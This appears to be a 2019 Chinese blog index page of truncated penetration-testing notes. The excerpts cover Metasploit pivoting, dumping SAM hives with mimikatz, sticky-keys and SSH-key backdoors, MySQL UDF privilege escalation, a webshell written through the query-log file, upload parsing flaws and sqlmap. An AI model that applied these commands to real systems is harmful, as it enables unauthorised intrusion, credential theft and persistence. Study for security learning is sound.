morris_pass_A

2019年7月4日

摘要： Metasploit 「跨网段攻击」添加路由表 run get_local_subnets run autoroute -s 172.16.63.0/24 background route print use auxiliary/scanner/portscan/tcp show options 路阅读全文

posted @ 2019-07-04 18:33 morris_pass_A 阅读(127) 评论(0) 推荐(0) 编辑

获取用户密码

摘要：使用SAMInside获取用户密码 reg save hklm\sam C:/sam.hivereg save hklm\system C:/system.hive 用cain解密或者复制sam到自己本机上然后再用 mimikatz获取登陆过的账号密码 mimikatz log privilege 阅读全文

posted @ 2019-07-04 18:23 morris_pass_A 阅读(531) 评论(0) 推荐(0) 编辑

后门维持

摘要：密码破解 shift后门 shift控制 Windows c:/system32/sethc.exe 换成cmd.exe 追加自己的公钥 ssh-keygen 生成公钥ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub 获取自己的公钥连接的时候可以指定私钥来连接 ssh 阅读全文

posted @ 2019-07-04 18:02 morris_pass_A 阅读(181) 评论(0) 推荐(0) 编辑

数据库提权

摘要： MOF提权 UDF提权 select load_file('/var/www/html/udf/udf.so') into dumpfile "/var/lib/mysql/udf.dll" create function sys_eval returns string soname 'udf.so 阅读全文

posted @ 2019-07-04 17:57 morris_pass_A 阅读(328) 评论(0) 推荐(0) 编辑

信息收集

摘要：信息收集： Google Bing Baidu Yahoo 子域名挖掘机主站爬取-crossadmin.xml Whois 反查询 https://www.benmi.com Ip反查询 Site.ip138.com 工具:Subdomainbrute sublist3r 服务信息收集: 大小写敏阅读全文

posted @ 2019-07-04 17:49 morris_pass_A 阅读(109) 评论(0) 推荐(0) 编辑

获shell的不同姿势

摘要：开启日志的情况下 access.log 用burp让其转义，然后用文件包含可以执行其中代码 general_log slow.log set global slow_query_log=1; set global slow_query_log_file='D://404.php' -- 地址 sel 阅读全文

posted @ 2019-07-04 17:14 morris_pass_A 阅读(148) 评论(0) 推荐(0) 编辑

文件上传解析漏洞

摘要：以下转自clancyb00m的github nginx nginx <8.03 空字节代码执行漏洞影响版本：0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问：就会执行PHP代码 nginx 1.6.2 如果hack.php不存在，就会以.ph 阅读全文

posted @ 2019-07-04 17:00 morris_pass_A 阅读(592) 评论(0) 推荐(0) 编辑

sqlmap使用

摘要：使用sqlmap用dump就要进行拖K，在本地C中的sqlmap，在c盘搜索sqlmap/outpot/ip/dump/中 sqlmap的语法结构分为免python环境的和需要python python sqlmap.py -(u|r) "(url|text)" -p "id" -u url -r 阅读全文

posted @ 2019-07-04 16:43 morris_pass_A 阅读(222) 评论(0) 推荐(0) 编辑

关于Windows的小笔记

摘要： nslookup正向解析为ip地址 nslookup www.baidu.com nslookup -q=ptr ip地址逆向解析域名地址 nslookup -q=mx 查询邮件交换记录 nslookup set q=mx netstat -anb 显示各种网络相关信息 tasklist 看系统上阅读全文

posted @ 2019-07-04 16:38 morris_pass_A 阅读(150) 评论(0) 推荐(0) 编辑

关于数据库的函数

摘要： Mid(database() from 1 for 1)==mid(databse(),1,1) 在数据库中字符型字段中条件值为false可以获取全部数据数据库一般有三种报错 (1)Extractvalue()中第一个为错误参数就会错误报出第二个参数语句 (2)Floor(rand(0)*2) 插阅读全文

posted @ 2019-07-04 16:28 morris_pass_A 阅读(148) 评论(0) 推荐(0) 编辑

公告